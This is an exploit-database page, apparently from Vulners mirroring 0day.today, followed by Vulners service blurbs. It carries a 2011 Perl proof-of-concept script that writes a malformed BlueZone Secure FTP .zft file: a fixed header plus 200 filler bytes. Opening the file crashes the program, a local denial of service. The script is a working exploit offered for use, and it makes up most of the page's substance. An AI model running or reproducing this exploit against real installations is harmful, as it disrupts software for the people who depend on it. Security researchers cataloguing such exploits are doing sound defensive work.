Lucene search
K

BlueZone Malformed .zft file Local Denial of Service

🗓️ 23 Oct 2011 00:00:00Reported by Iolo MorganwgType 
zdt
 zdt
🔗 0day.today👁 22 Views

BlueZone Malformed .zft file Local Denial of Service exploi

Code
#!/usr/bin/perl -w
# Exploit Title: BlueZone Desktop Malformed .zft ffeil Local Denial of Service
# Date: 24-10-11
# Author: Iolo Morganwg
# Version: BlueZone Secure FTP v5.2C1 Build 1469
# Download: http://www.rocketsoftware.com/bluezone/products/secure-ftp/downloads/secure-ftp
# Tested on: Windows XP SP3
 
#To trigger: Run script {chwilfriwio.pl}, open with BlueZoneFTP, program dies - horribly!.
  
my $ffeil = "chwilfriwio.zft";
my $head = "BFTP100EKColorsVCustom@";
my $junk = "A" x 200;
  
open($ffeil, ">$ffeil");
print $ffeil $head.$junk;
close($ffeil);



#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2011 00:00Current
7High risk
Vulners AI Score7
22